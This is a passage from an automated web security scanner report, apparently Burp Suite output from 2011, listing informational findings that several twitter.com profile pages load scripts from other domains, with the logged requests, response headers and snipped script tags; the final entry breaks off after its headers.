18.363. http://twitter.com/RobertDuffy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /RobertDuffy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234761-53120-40106
ETag: "f34f1144d312daeb88ddd5b0f1726c5e"
Last-Modified: Fri, 28 Jan 2011 17:12:41 GMT
X-Runtime: 0.00919
Content-Type: text/html; charset=utf-8
Content-Length: 50511
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.364. http://twitter.com/ScampoLiberty

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ScampoLiberty

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ScampoLiberty HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:49:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265766-16900-43971
ETag: "8619adc934bf80f7ed7769cb2e43b4b1"
Last-Modified: Sat, 29 Jan 2011 01:49:26 GMT
X-Runtime: 0.00936
Content-Type: text/html; charset=utf-8
Content-Length: 50190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.365. http://twitter.com/Script_Junkie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Script_Junkie

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Script_Junkie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-37028-38797
ETag: "942c1294489429968d893d85a4217f57"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 47541
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.366. http://twitter.com/Sean_P_Doyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Sean_P_Doyle

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Sean_P_Doyle HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-13440-19408
ETag: "cb86339c5381a14bf8b1d3e2b36126a2"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01448
Content-Type: text/html; charset=utf-8
Content-Length: 49550
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.367. http://twitter.com/Servigistics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Servigistics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234664-66120-7492
ETag: "7f30e0eaceac6c09785aa2f10c88bbb9"
Last-Modified: Fri, 28 Jan 2011 17:11:04 GMT
X-Runtime: 0.00995
Content-Type: text/html; charset=utf-8
Content-Length: 50884
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.368. http://twitter.com/Servigistics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Servigistics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-39147-1499
ETag: "7908e6f2089de69430d5a81b1f257ac2"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01232
Content-Type: text/html; charset=utf-8
Content-Length: 50563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.369. http://twitter.com/ShaunieONeal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ShaunieONeal

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ShaunieONeal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-84120-54992
ETag: "f0218d983026f5440ea1c0cdd842e2ee"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01493
Content-Type: text/html; charset=utf-8
Content-Length: 50321
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.370. http://twitter.com/Simply_b06

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Simply_b06

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Simply_b06 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225007-69414-28796
ETag: "24db63c3097b33b2dc035ce49f9408ff"
Last-Modified: Fri, 28 Jan 2011 14:30:08 GMT
X-Runtime: 0.01086
Content-Type: text/html; charset=utf-8
Content-Length: 36440
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
